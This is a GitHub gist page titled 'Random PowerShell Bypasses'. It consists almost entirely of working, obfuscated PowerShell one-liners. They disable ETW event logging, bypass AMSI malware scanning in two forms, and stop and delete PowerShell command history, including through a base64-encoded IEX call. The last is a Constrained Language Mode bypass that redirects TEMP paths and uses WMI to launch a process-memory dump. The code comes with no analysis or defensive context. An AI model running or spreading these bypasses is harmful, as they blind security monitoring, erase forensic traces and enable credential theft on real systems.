-
-
Save ekmixon/4388a17185215fbc3807a52ce574f519 to your computer and use it in GitHub Desktop.
Random PowerShell Bypasses
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Logging bypass: | |
| (({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid))) | |
| # AMSI Bypass (old, burned) | |
| sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) | |
| # New AMSI bypass obfuscation: | |
| [ReF]."`A$(echo sse)`mB$(echo L)`Y"."g`E$(echo tty)p`E"(( "Sy{3}ana{1}ut{4}ti{2}{0}ils" -f'iUt','gement.A',"on.Am`s",'stem.M','oma') )."$(echo ge)`Tf`i$(echo El)D"(("{0}{2}ni{1}iled" -f'am','tFa',"`siI"),("{2}ubl{0}`,{1}{0}" -f 'ic','Stat','NonP'))."$(echo Se)t`Va$(echo LUE)"($(),$(1 -eq 1)) | |
| # Neuter Writes to History Log: | |
| Set-PSReadlineOption -HistorySaveStyle SaveNothing | |
| # Encoded version of blocking writes to history | |
| [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('UwBlAHQALQBQAFMAUgBlAGEAZABsAGkAbgBlAE8AcAB0AGkAbwBuACAALQBIAGkAcwB0AG8AcgB5AFMAYQB2AGUAUwB0AHkAbABlACAAUwBhAHYAZQBOAG8AdABoAGkAbgBnAA==')) | IEX | |
| # Delete history logs | |
| rm (Get-PSReadlineOption).HistorySavePath | |
| # Constrained Language Mode Bypass | |
| $command = @" | |
| powershell -c "iex (cat c:\users\public\documents\Invoke-MemoryDump.ps1 | out-string); Invoke-MemoryDump -ProcID 544 -OutputPath 'C:\users\public\documents\out.dmp'" | |
| "@ | |
| $CurrTemp = $env:temp | |
| $CurrTmp = $env:tmp | |
| $TEMPBypassPath = "C:\windows\temp" | |
| $TMPBypassPath = "C:\windows\temp" | |
| Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp -Value "$TEMPBypassPath" | |
| Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value "$TMPBypassPath" | |
| Invoke-WmiMethod -Class win32_process -Name create -ArgumentList $command | |
| sleep 5 | |
| Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp -Value $CurrTmp | |
| Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value $CurrTemp | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment